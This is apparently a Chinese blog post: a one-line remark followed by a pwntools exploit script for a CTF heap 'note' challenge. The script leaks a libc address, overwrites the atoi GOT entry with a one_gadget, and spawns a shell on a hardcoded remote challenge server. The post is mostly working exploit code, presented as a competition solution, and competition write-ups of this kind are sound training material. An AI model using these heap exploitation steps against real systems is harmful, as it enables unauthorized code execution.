生活如此艰难,事情多到无暇做题Orz
上周六3CTF复赛唯一的pwn题
#!/usr/bin/env python
from pwn import *
DEBUG = 0
REMOTE = 1
if (DEBUG):
context.log_level = 'debug'
if (REMOTE):
p = remote('180.153.183.86',10001)
elf = ELF('./92226e82',checksec=False)
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6',checksec=False)
else:
p = process('./92226e82')
elf = ELF('./92226e82',checksec=False)
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6',checksec=False)
def add_note(size,encode,secret):
p.sendlineafter('choice:',str(1))
p.sendlineafter('secret\n',str(size))
p.sendlineafter('secret ?\n',str(encode))
p.sendafter('secret:\n',secret)
def show_note(idx):
p.sendlineafter('choice:',str(2))
p.sendlineafter('notes:',str(idx))
def edit_note(idx,secret):
p.sendlineafter('choice:',str(3))
p.sendlineafter('edit:',str(idx))
p.sendafter('secret:\n',secret)
def del_note(idx):
p.sendlineafter('choice:',str(4))
p.sendlineafter('destroy:',str(idx))
def exp():
add_note(182,0,'A'*180)
add_note(10,0,'AAAA')
del_note(0)
add_note(10,0,'AAAA')
add_note(11,1,'MTExMTIyMjI')
show_note(2)
p.recvuntil('11112222')
one = u64(p.recv(6).ljust(8,'\x00'))-0x3c4b78+0xf1147
print hex(one)
add_note(-1,0,'\x00'*520+p64(0x21)+p64(0)+p64(elf.got['atoi']))
edit_note(0,p64(one))
# get shell
p.sendlineafter('choice:',str(1))
p.sendlineafter('secret\n','sh')
p.interactive()
if __name__ == '__main__':
exp()
网友评论